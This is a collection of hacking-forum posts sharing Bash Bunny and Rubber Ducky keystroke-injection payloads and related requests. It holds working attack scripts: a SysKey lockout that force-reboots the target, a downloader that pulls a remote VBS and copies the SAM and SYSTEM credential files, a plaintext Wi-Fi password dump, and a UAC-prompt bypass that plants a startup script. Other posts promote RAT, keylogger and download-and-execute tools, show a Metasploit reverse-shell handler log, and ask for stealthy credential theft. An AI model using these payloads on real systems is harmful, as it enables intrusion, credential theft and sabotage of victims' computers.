Search the Community

I saw a Syskey Prank done on a USB via RubberDucky. So I decided to rewrite one for the Bashbunny even tho it really serves no great purpose. So furthermore, after Syskey'ing myself. I dont want the dang thing anymore, so I'm releasing it. #!/bin/bash # # Title: SysKey and Reboot # Author: Ar1k88 # Version: 1.1b # Target: Windows 7-10 # # LED | Function # --------------------------------------------------------- # MAGENTA SLOW - USB Detection/Setup # YELLOW FAST/VERYFAST - Script Startup/Execute # CYAN VERYFAST - Shutting down Target Machine # GREEN BLINK/SOLID - Shutting down Bashbunny for safe removal # LED OFF - Bashbunny is Off, Safe to remove. # # Startup Delay 3 seconds. LED M SLOW ATTACKMODE HID Q DELAY 3000 # Force to Desktop LED Y FAST Q GUI d Q DELAY 250 # Open Run and Syskey Q GUI r Q DELAY 500 Q STRING syskey Q ENTER Q DELAY 500 # UAC Bypass Q ALT y # Setup Syskey - Setting Password as bashbunny LED Y VERYFAST Q DELAY 500 Q STRING u Q DELAY 250 Q STRING p Q DELAY 250 Q STRING w Q DELAY 250 Q STRING bashbunny Q TAB Q DELAY 250 Q STRING bashbunny Q DELAY 250 Q ENTER Q DELAY 500 Q ENTER # Rebooting Target Machine LED C VERYFAST Q GUI r Q DELAY 500 Q STRING CMD Q ENTER Q DELAY 500 Q STRING shutdown /r /f /t 0 Q ENTER Q DELAY 250 # Success - Starting Bashbunny Safe Shutdown LED SUCCESS sync -o Q DELAY 3000 shutdown 0 SysKey Password: bashbunny Please be responsible. ;) -Ar1k88

Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤

This is a simple ducky script I wrote that will clear your google chrome history and automatically log you off tested on windows 7 (Windows 8-10 requires modification because of start menu.) This payload is useful for when run/GUI + R is blocked DELAY 1000 CTRL + H DELAY 750 DELETE DELAY 2000 CTRL + W DELAY 750 GUI DELAY 100 TAB DELAY 100 TAB DELAY 100 ENTER You may want to increase the delays as most library computers can be slower than the average machine.

Hi there, I have a little question, i love my bash bunny, create a lot of payloads (i will post them when really finished), but still have some question. Actually for all my payload i open a terminal, minimize it and do my stuff. When i look at this kind of payload , on line 24 there is a unix command "mkdir". So, it's possible to use unix command without a terminal ? Reminder for people who read this topic, working unix command in payload : mkdir source export

So I was recently looking into NFC and how cool it is to read/write to a tag to be able to use it to control your phone, clone a card (don't do dis - illegal) and other cool stuff and I thought about making a payload that installs an app on an Android (can use HID if you wanted to..) phone then runs the app in the background. What this app does is it waits to read an NFC tag which then executes a command. The command is stored on the NFC tag itself (so you install the app on the phone and come back later with your NFC tags to do all your fancy work). Works, basically, (dare I say it..) like a 'Powershell agent'. You could make like 10 different tags that can do different things on the phone. You only have to brush the tags near the phone for the phone to execute the commands. Commands could be: - Send an SMS to yourself (phone number is stored on NFC tag so it won't be stored on the phone itself) with phone data - Call someone (prank call but..you pranked the actual call itself) - Open a webpage and download a file - Download an app from the app store - Add a contact (dunno why..) - Execute a Linux command (requires rooted Android) - Enable hotspot with specified password (you could use their data..more of an annoyance than anything else - would need rooted device to change the password) - Enable Bluetooth/WiFi - Change the volume of the device (shoot it up, make it silent..) - Make it vibrate for the next 10 minutes (That would be hilarious) - Make it start randomly ringing - Add a huge number of alarms that go off every minute/hour - Enable hotspot and start a server so that you could join it and remotely manage files/apps/settings (includes starting an ADB server...oooooooo..) Possibilities are endless... Just an idea. Installing the app from the Bash Bunny onto the device is the tricky part.

Hello. I was messing around with metasploit. Im using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at Starting the payload handler... The new one works fine. Need help fixing it please. Here's the Armitage log: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST PUBLIC IP LHOST => PUBLIC IP msf exploit(handler) > set LPORT 4443 LPORT => 4443 msf exploit(handler) > set Encoder x86/shikata_ga_nai Encoder => x86/shikata_ga_nai msf exploit(handler) > set EXITFUNC process EXITFUNC => process msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set Iterations 3 Iterations => 3 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on PUBLIC IP:4443 [*] Starting the payload handler...

Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.

Violation of CoC

Here is my new payload to attack a Mac without using terminal. I got this idea after seeing how using good management software, an administrator can remove an app from a Mac (one such application being terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files and all without terminal. I used Grab.app for this but almost any app could be used, I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it. Here is the code, its outcome is to simply "say hello" (so if you test it have the volume up a bit). I have not really played with the delays yet, they are all over the place and some are to high but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have Fun, but please use this responsibly. DELAY 2000 COMMAND SPACE DELAY 300 STRING /Applications/Utilities/ DELAY 200 ENTER DELAY 400 STRING g DELAY 500 COMMAND c DELAY 300 COMMAND SPACE DELAY 300 STRING /Users/Shared/ DELAY 400 ENTER DELAY 400 COMMAND v DELAY 2000 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app/Contents/MacOS/ DELAY 600 ENTER DELAY 500 TAB DELAY 500 COMMAND o DELAY 500 COMMAND a DELAY 500 STRING #!/bin/bash DELAY 400 ENTER DELAY 300 STRING say DELAY 300 ESCAPE DELAY 300 SPACE DELAY 300 STRING hello DELAY 300 COMMAND s DELAY 400 COMMAND q DELAY 500 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app DELAY 400 ENTER COMMAND w COMMAND w COMMAND w

Hi there, I just finished the first version of my BB keylogger. It basicly launches a powershell which keylogs to the loot folder of the BB. Features: Fast launching (thanks to USB Exfil for the one line launcher) Leaves no traces when cleanup is enabled. (Insert feature?) Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger VincBreaker PS: I will create a push request upon positive feedback and improve the payload in the other case.

TLDR: https://github.com/ThoughtfulDev/PyDuckGen Hey, since the Simple-Ducky Payload Generator is discontinued i think.. i just wanted to create an easy way to generate existing payloads and move the needed files to the Rubber Ducky. PyDuck is a Python Script which helps you to get your once written USB Rubber Ducky Payloads onto your Duck's SDCard quickly. You can even change variable components by using a simple set <attribute> <val> command. All of this is made easy with a Metasploit like interface. Simply choose your payload with use <payload> configure it and there you go :) Have a look into the bundled modules in the module folder to understand the attributes but here is a quick explanation. Your duckscript is: ... STRING <replacable_text> ... In your module.json just add you attribute to the attributes tree like this: "attributes": { "replacable_text": "The default value" } If you know load your payload with 'use <your_payload>' you can now use the following: set replacable_text Hak5 is awesome :) If you then generate the inject.bin using: gen or generate the <replacable_text> will be replaced with Hak5 is awesome. Isn't that...awesome? :D You can even add folder/files to your module.json which are needed for you payload (have a look at the mimikatz_lazagne payloads to see how this works.) I really suggest that you have a look at the existing payloads to figure out how this works :D More Information can be found on the Github Repo: https://github.com/ThoughtfulDev/PyDuckGen Let me know what you think.

Here's a simple payload to download and execute a powershell payload locally from the BashBunny. This payload is especially useful when running larger Powershell scripts. It's much faster than waiting on HID keystrokes.

Hey all, I rewrote the WiPassDump payload (along with every other person on the planet), but hopefully this one is the best so far. I've cut everything down to 1 file, and the actual attack takes up about 4 lines. As an added bonus I've added hak5darren's code to remove the "run" dialogue history as well. The pull request can be viewed here: https://github.com/hak5/bashbunny-payloads/pull/132 Hope you guys like it.

Hi, I am new to this forum. Hello! Nice to meet you all! I am planning a hacking demonstration on national TV in my country and I want to show the bashbunny and what it can do on a live show. For this I need a demonstration payload which can be used to show what a hacker can do. Starting points: - assume windows laptop with recent and updated operating system - assume the "'hack" should be carried out on a computer that is on but possibly locked (with user logged in) - I have maybe 30 minutes in total, but this part should only take maximum three-fives minutes including showing the results of the hack and explaining what it means - the audience is the general public without any detailed technical understanding Ideas: - can we make a demonstration payload that can showcase some hacks that will work most of the time? - can this be a combination of payloads that results in e.g. Copies files, passwords, backdoor? - for the hack only one or very few files need to be exfiltrated to demonstrate - not all files. - ideally the demonstration should result in audience says "wow, that was incredible, can that really be done"? Solution and ideas - this is where I need you guys and gals. Any ideas? /Blix

Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer

CrackMapExec is a fantastic tool developed by Byt3bl33de3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec As stated in the repo's README, it's powered by Impacket and takes queues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so: cd /pentest curl -k -O https://bootstrap.pypa.io/get-pip.py Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script: python get-pip.py That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work. apt-get install build-essential libssl-dev libffi-dev python-dev Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. Run pip: pip install crackmapexec Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is: crackmapexec $TARGET_IP That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this: crackmapexec $TARGET_IP -u "" -p "" That tells CME to try a Null session with SMB. If the target disallows Null sessions nothing bad happens. You still get the basic OS details. If the target allows for a Null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.

Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000 REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this.

Hello Hak5 members, New to this site and platform, but am pretty excited to be back in the states and to get my hands on the Tetra I purchased. When looking at modules I can't seem to find something similar to the MITMf framework integrated into it. This takes use of filepwn, but I have been having a great experience using Shellter. Where should I go for learning how to integrate a new module into the Pineapple? Here is what I am wanting: 1. Client makes request for .exe file 2. Pineapple forwards to the web server 3. Web server responds 4. Pineapple receives the traffic: If (PARAMS == TRUE): Pass the executable over to Shellter, inject a payload, then forward to the client. else: forward to the client Some of the params you would setup would be maximum file size (to make sure the process doesn't take too long), if the program is already wrapped, etc. Ideally, one would be running some sort HTTPS downgrade attack, or SSL Stripper, so the probability of injection is higher as most sites now use https. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow user's to pipe the executable to whatever program they want to handle the payload injection and just have the module looking for the created file to popup in a specific location.

So I was wondering how do you program your own payload/backdoor? I usually use veil-evasion but I wanna learn how to program it my self.

Since I was introduced to a typewriter when I was 2 years old I have never bothered to practice and learn to type 60+ wpm never the less 900 - 1,200 WPM when the RbbrDucky is inserted. Repetition and with the aid of shorthand keyboard shortcuts has been the only way I have learned to make me appear to type as fast as a 60+ wpm Typer. ALT + Tab, Windows Key + R , I have become a mastermind of getting where I need to be in an OS using less keys that I have to type. Since a lot of tasks I perform are repetitious in Linux, especially in KALI, I have not read of anyone using the RubberDuck to automate their task as the super typer HID now becomes a scripted AI or "the hacker from Swordfish" mashing on the keys. So I wanted to create a new Thread dedicated to "Linux Only" whereby you are using Twin Duck firmware with option 1 "pressing caps lock" to activate the Duck inject.bin. I am not intending to hack Kali Linux or any Linux distro system with a payload. The objective is to have AI "superman" type for me what I would normally would type in Kali or any Linux distro to carry out an automated attack. Using Kali, I have enabled a custom keyboard shortcut in keyboard settings to open the terminal, my example "Super + t" or "CTRL + ALT + t" in my Ducky Payload Script WINDOWS t GUI t CTRL ALT t COMMAND t All do not open a custom terminal keyboard shortcut. So I am a bit stuck on this first step.

I purchased the Rubber Ducky recently to grab windows login creds from Windows 10. I was unaware at the time that it wouldn't quite work as solid on 10 as it does with older versions of windows. After testing on various other versions and having it upload the .creds to my server nothing happened when I attempted it on my target machine (Windows 10). I played around with quite a bit and finally got the .creds uploading but with 0 data. Doing some research I came across this page explaining using PowerMemory to edit the registry for storing plaintext credentials. I did this the manual way, rebooted, and viola I have my .creds file on the server with the credentials. However this was done on a test machine and not my target machine. HERE IS MY REQUEST: Does anyone have or can write a payload to automate this process in a stealth manner much like the Mr Robot payload? Maybe I am overlooking something as I am so new to this. Also it could be possible that it would have worked without PowerMemory editing the registry as I disabled Windows Defender before trying PM as I saw it has blocked some MK features during my previous attempts. Any feedback would be greatly appreciated!

You may have to change some delays and this was tested on windows 10. Ps: I know this is simple just didn't see anyone post about it and thought some of you guys might like this. More codes scripts and videos to come be sure to check me out on YouTube https://www.youtube.com/user/everythingdigital1 and my website http://everythingdigital1.com/ ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- DELAY 500 REM *** Bypass UAC *** GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 5500 ALT y DELAY 500 STRING cd \ ENTER STRING cd %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup ENTER REM *** Delete update vbs file if already exists *** STRING erase /Q update.vbs ENTER STRING copy con update.vbs ENTER STRING dim speechobject ENTER STRING set speechobject=createobject("sapi.spvoice") ENTER REM *** Change text in quotes to what you want computer to say *** STRING speechobject.speak "Hello user I am watching you" ENTER CONTROL z ENTER REM *** Exit *** STRING EXIT ENTER

hey guys ive been exploiting my OWN !!! tablet and phone recently my phone is running marshmellow 6.0.1 the tablet uhmm ...kit kat ? something lol 4.4 i think lol ok ive created a payload with msfvenom and made the .apk payload and u have to accept the permisions and install and open the payload to run the binary right ?? ok what i want to know is just like in windows u can create shellcode and drop it into the cmd or drop it into a jpg file and it just runs your binary no questions asked lol is there any way to run somekind of shellcode "like" payload on android so i can send the payload via sms or email ect ... so when the user clicks on it it just runs the binary ? so basically what i would like is to embed a payload for android into a jpg /jpeg/png it has to be a picture i know about the pdf deal i want to do this with a picture ...if ive been unclear in any way feel free to ask i will try my best to explain better of what i want thanks in advance i cant wait to hear all your feed back good or bad i accept it all ty ....and special thanks to the whole hak5 community for just being here u all are great who else would i be able to ask questions like this to lmao

Hi, this small playload leave a YouTube subscription to your channel, if the target Windows maschine is online and the User is logged in into his default browser. The ID must be replaced with your channel ID. REM Give me a YouTube sub REM will open youtube URL with default browser and leave a sub and close the browser REM replace the ID with your own DELAY 1000 GUI r DELAY 200 STRING https://www.youtube.com/channel/Channel_ID?sub_confirmation=1 ENTER DELAY 5000 TAB TAB SPACE DELAY 1000 ALT F4

This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered when the ducky is connected to any targeted windows machine. It will execute an powerful one-liner inside the "run" dialog of the system. The one liner is a simple powershell script, that when executes instantly hides then powershell windows and runs it the background. The powershell script downloads and execute our stage 2 .vbs payload in the %temp% directory Stage 2: Once your .vbs payload is on the system, we proceed to download our main binary payload. The .vbs script exploits a flaw in the windows registry system, this allows us to execute any binary file on the system with admin privilege without prompting the user for access (UAC). My Twitter: https://twitter.com/SkiddieTech